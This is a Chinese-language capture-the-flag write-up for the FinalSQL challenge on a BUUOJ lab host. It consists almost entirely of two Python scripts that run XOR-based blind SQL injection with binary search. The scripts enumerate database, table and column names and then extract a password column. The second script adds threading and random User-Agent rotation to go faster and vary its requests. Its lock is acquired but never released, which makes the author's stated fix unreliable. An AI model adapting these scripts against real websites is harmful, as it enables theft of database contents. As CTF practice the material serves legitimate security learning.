[极客大挑战 2019]FinalSQL（异或盲注，二分法加多线程）

点到第三个找到注入点，异或盲注，但这题很恶心，最后爆值的时候flag前面有很多无用信息，遂将这题当作脚本编写练习题，将嫖来的二分法脚本加上了多线程（只用二分法要跑10分钟）

这是别人博客嫖来的二分法注入脚本
https://www.cnblogs.com/wangtanzhi/p/12305052.html

#sql injection.py
# -*- coding: UTF-8 -*-
import re
import requests
import string
 
url = "http://1deb2c9a-0a0a-4ca3-b983-d779588217ef.node3.buuoj.cn/search.php"
flag = ''
def payload(i,j):
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)                                #数据库名字          
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)           #表名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)        #列名
    sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"%(i,j)
    data = {"id":sql}
    r = requests.get(url,params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
 
    return res
 
def exp():
    global flag
    for i in range(1,10000) :
        print(i,':')
        low = 31
        high = 127
        while low <= high :
            mid = (low + high) // 2
            res = payload(i,mid)
            if res :
                low = mid + 1
            else :
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)
 
exp()
print('flag=',flag)

用二分法跑出数据用了10分钟 ，实在忍不了，加了多线程一分半就能跑完（第一次写，有什么需要改进的还望指点）

#sql injection v2.py
# -*- coding: UTF-8 -*-
import threading
import requests
import random
user_agent = [
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3"
]

class MyThread(threading.Thread):
    def __init__(self, func, args):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args
    def getresult(self):
        return self.res
    def run(self):
        self.res = self.func(*self.args)

def payload(i,j):
    global url
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)                                #数据库名字          
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)           #表名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)        #列名
    sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"%(i,j)
    #print(i)
    header = {'User-Agent': user_agent[random.randint(0,7)]}
    data = {"id":sql}
    r = requests.get(url,params=data,headers=header)
    #print (r.text)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
 
    return res
 
def exp(a,i):
    lock = threading.Lock()
    low = 31
    high = 127
    lock.acquire()
    while low <= high :
        mid = (low + high) // 2
        o=a+i
        #print(o)
        res = payload(o,mid)
        if res :
            low = mid + 1
        else :
            high = mid - 1
    asci = int((low + high + 1)) // 2
    if (asci == 127 or asci == 31):
        return 0
    # print (asci)
    return chr(asci)
    lock.release()

def main():
    global flag
    a=1
    f=True
    while f:
        threads = []
        for i in range(8):
            t = MyThread(exp, (a,i))
            threads.append(t)
        for i in range(8):
            threads[i].start()
        for i in range(8):
            threads[i].join()
            if threads[i].getresult()==0:
                f = False
            flag = flag + str(threads[i].getresult())

        a = a+8
        print(flag+"\n")
if __name__ == '__main__':
    flag = ""
    url = "http://1deb2c9a-0a0a-4ca3-b983-d779588217ef.node3.buuoj.cn/search.php"
main()

之前没加进程锁，最后几位flag内容会出错，加了之后试了几次都ok